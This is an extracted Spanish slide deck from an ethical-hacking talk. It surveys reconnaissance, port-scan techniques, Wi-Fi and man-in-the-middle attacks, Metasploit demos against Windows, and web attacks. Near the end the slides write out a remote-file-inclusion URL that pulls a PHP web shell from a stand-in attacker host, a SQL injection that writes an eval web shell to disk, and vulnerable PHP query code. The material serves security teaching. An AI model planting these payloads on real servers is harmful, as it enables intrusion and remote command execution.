Está en la página 1de 55

Tcnicas avanzadas de

penetracin a sistemas

Ponente: Rafael Gmez


Del ngel
Aka : NoSfEr@tU

HACKING ETICO
Los hackers ticos son profesionales de la
seguridad que
aplican sus conocimientos de hacking con
fines
defensivos (y legales). Diremos hacker
siempre, pero hay que fijarse en el
contexto.

QUE ES UN HACKER
Experto en algn campo de la
informtica
Conocimientos profundos de
diversas Plataformas (Windows,
Unix, Linux, android).
Conocimientos de redes
Conocimientos de hardware y
software.

Pasos previos al
ATAQUE
1.Reconocimie
nto
. Pasivo
. Activo

2. Rastreo
(escaner)
3. Acceso
. Niveles del
Sistema
. Redes
. DOS

4. Mantener el
acceso

FOOTPRINTING
Obtencin de los perfiles de seguridad de una
organizacin haciendo uso de una
metodologa (footprinting).
El resultado del footprinting es un perfil
nico de la organizacin en cuanto a sus
redes (Internet / Intranet / Extranet /Wireless)
y sistemas.

FOOTPRINTING
1.- Obtener informacin inicial
whois
nslookup
2.- Localizar el rango de red
Traceroute

TIPOS DE ATAQUES
1.- Hacking WIFI
2.-DOS
3.-DDOS
4.-M.I.T
5.Envenenamiento
DNS
6.-Reverse Shell
7.-Port scaning

8.-Inyecciones
SQL
9.-R.F.I
10.-XSS
11.-Inyeccion de
comandos
arbitrarios
12.-Hijacking
13.-Cookie
poisoning

Hacking Wifi

Definiciones
BSSID
SSID
monitor
AP
STATION
DOS

IVS
Mode
WEP
WPA

Que Ataques
analizaremos?
Hacking WEP
Fake AP
Wifi DOS (A usuarios y
sobre saturacin de frecuencias)

Fake Ap
mtodo De
Ataque y contra Ataque

DOS (Denial of
service)
En redes Wifi

*Sobre saturacion de Frecuencia


*Des-autentificacion infinita de
usuarios

Deteccin y
Wardriving
Anlisis

Escaneo de
Puertos
El escaneo de puertos es el ataque
primario y mas comn utilizado en una
auditoria ya sea legal o ilegal.
Nos permite :
Explorar
Identificar
Comprender

Tcnicas
Tipo de
escaneo

Abiert
o
TCP
connect ()
Reverse
Ident

Medio
abiert
o

Silencio
so

Barrid
os

TCP SYN

TCP FIN

TCP echo

Zombie
scan

ACK Scan

UDP echo

Null Scan

TCP ACK

Xmas Scan
SYN/ACK
Scan
Fragmentacin
TCP

TCP SYN
ICMP
echo

Otro
s
UDP
scan
FTP
bounce
scan

TCP connect()
La mas comn de cualquier software de escaneo
de puertos
consiste en usar la llamada connect() de TCP
Intenta establecer conexin
Si conecta el puerto esta abierto
si no , el puerto esta cerrado
Si no contesta esta silencioso
Muy rpido e invasivo y llamativo en exceso.
* Miles de conexiones
*Logs

Comportamiento
TCP connect()
Hacker-------[SYN]------>[0]
Puerto
TCP
Victima OPEN
Hacker<-------[SYN/ACK]-------[0]
Puerto
TCP Victima OPEN
Hacker-------[ACK]------->[0] Puerto TCP
Victima OPEN
Hacker-------[SYN]------->[X] Puerto
Victima CLOSED
Hacker<-----[RST]-------[X]
Puerto
Victima CLOSED

TCP
TCP

TCP SYN
Tcnica conocida como Half-open scan, escaneo
medio abierto por excelencia
se enva un paquete SYN fingiendo establecer
una conexion y se espera la respuesta del Host,
si llega un paquete SYN/ACK
significa que esta abierto y no devolvemos la
contestacin ACK, devolvemos RST , esto para
evitar que se complete el inicio
de conexin y as burlar el registro del sistema
como intento de conexin

*Discreto

Comportamiento
TCP SYN
Hacker ---[SYN]---> [O] P. TCP abierto en la
Victima
Hacker <---[SYN/ACK]--- [O] P. TCP abierto
en la Victima
Hacker ---[RST]---> [O] P. TCP abierto en la
Victima
Hacker ---[SYN]---> [X] Puerto TCP cerrado
en la Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado
en la Victima

ACK scan
Destinado a identificar aquellos puertos que
estn en estado silencioso de forma precisa
cuando un puerto esta en este estado o no.
Enva paquetes ACK con nmeros de secuencia y
confirmacin aleatorios.
si el puerto esta abierto, responder con un
paquete RST, pues no identificara la conexin
como suya
si el puerto esta cerrado responder RST pero si
no responde es que esta filtrado.
* Apoyo de un escaneo anterior
*Variable del ping si responde RST
esta vivo si no es in alcanzable.
*Identificar firewall bloqueando SYN.

Comportamiento
ACK scan
Hacker ---[ACK]---> [O] Puerto TCP abierto
en la Victima
Hacker <---[RST]--- [O] Puerto TCP abierto
en la Victima
Hacker ---[ACK]---> [X] Puerto TCP cerrado
en la Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado
en la Victima

Null scan
Similar al FIN, funciona del mismo modo,
enviando paquetes malformados, pero en
este caso con
los flags desactivados, si el puerto esta
cerrado nos responder con RST y En caso
de no recibir nada el puerto esta abierto o
silencioso.
Ciertos firewalls vigilan los paquetes de
finalizacin aqu hace lo que FIN no.

Comportamiento
Null scan
Hacker ---[ ]---> [O] Puerto TCP abierto en
la Victima
local ---[ ]---> [X] Puerto TCP cerrado en la
Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado
en la Victima

La razn

POC
Analizar 2 tipos de
escaneo con la intencin de
evadir un firewall y obtener
informacin acerca de los
puertos abiertos.

Ataques MIT
1.
2.
3.

DNS cache poisoning


ARP Poisoning
Phishing

EXPLOTACION

Escner de
vulnerabilidades

Escner de
vulnerabilidades

EXPLOTACION

Metasploit
Windows Server 2003

Penetracin
Windows Server 2003
prueba de concepto

Puerto 445
1.
2.
3.
4.

ms08067
Crear usuario
Habilitar Escritorio Remoto
Cambiar la contrasea del Administrador

OBJETIVO
Mostrar el ataque de
penetracin a Windows server
2003 en un ambiente
controlado.

Metasploit
Windows Server 2008 R2

Metasploit
Windows Server 2008 R2
Numero de vulnerabilidad : ms09050
Encontrar el servidor verificando
versin de smb
Explotar la vulnerabilidad
Denegacin de servicios.
OBJETIVO
Mostrar el ataque de
Denegacin de servicios a
Windows server 2008 en un
ambiente controlado.

Metasploit
Windows XP SP3

Metasploit
Penetracin a Windows XP SP3
Prueba de concepto

1.Encontrar la victima verificando


versin de SMB
2.Lograr la obtencin de una reverse
shell
3.Habilitar el uso de escritorio remoto
4.Inyectar la conexin a escritorio
OBJETIVO
Mostrar
remoto
el ataque de
penetracin a windows XP sp3
en un ambiente controlado.

Metasploit
Windows 7

Metasploit
Windows 7 Penetracin
Prueba de concepto

1. Usar INGENIERIA SOCIAL


2. Copiar netcat a la victima y crear
puerta trasera creando REVERSE SHELL
3. Vulnerar navegador web.
4. UPLOAD MI PATH
C:\DESTINO\\Downloads
OBJETIVO
Mostrar el ataque de
penetracin a windows 7 en un
ambiente controlado.

Ataques
WEB

Ataques
XSS

Analicemos la vulnerabilidad de xss

Es una vulnerabilidad de grado medio alto ya que


con estos ataques ser posible el re alizar el
hijacking que es el robo de identidad mediante las
cookies del navegador

Ataques XSS

Ataques
XSS

Ataques XSS

Ataques RFI
Remote file
inclusion
vulnerabilidad que afecta nicamente a paginas
dinmicas programadas en PHP, consiste en enlazar
archivos ubicados en un servidor remoto.
RFI se aprovecha del uso irresponsable de las
funciones include y requiere, las cuales, debido al
limitado conocimiento del programador y
las pocas o nulas validaciones que realiza antes de
incluir una variable recibida por
parametro de URL, pueden ser aprovechadas por
usuarios maliciosos para incluir scripts
programados para explotar dicha vulnerabilidad.

Ataques RFI
Remote file
inclusion
http://www.victima.com/index.php?
http://www.victima.com/index.php?
nav=pagina1php
nav=pagina1php
http://www.victimacom/index.php?
http://www.victimacom/index.php?
nav=pagina2.php
nav=pagina2.php
<?php
<?php
print
print
system($_GET['comman
system($_GET['comman
d']);
d']);
?>
http://www.victima.com/index.php?
?>
http://www.victima.com/index.php?

nav=http://atacante.com/shell.txt&command=ls
nav=http://atacante.com/shell.txt&command=ls

Inyeccion
SQL
union all select "<?php
eval($_GET['exec']); ?
>",2,3,4into
outfile"/var/www/html/ex
ec.php"

Analicemos
este cdigo

<?php
$link = mysql_connect('127.0.0.1','root', 'pass');
mysql_select_db('ejemplo', $link);
$sql = mysql_query('select * from ejemplo where id='.
$_GET['id'], $link);
if(mysql_errno($link))
{ echo mysql_error($link);
exit;
}
while($row = mysql_fetch_assoc($sql))
{ echo $
row['id']."
".$row['titulo']."
".$row['contenido']."
".$row['parent'];
}?
>

Busqueda de
tablas.

Prueba de
concepto
OBJETIVO
Mostrar el ataque de inyeccin
SQL y la tcnica de intrusin de
SHELL en un ambiente
controlado.

EL
RESULTADO
llegando a una
conclusin

El
resultado.

GRACIAS

Ponente: Rafael Gmez


Del ngel
Aka : NoSfEr@tU

También podría gustarte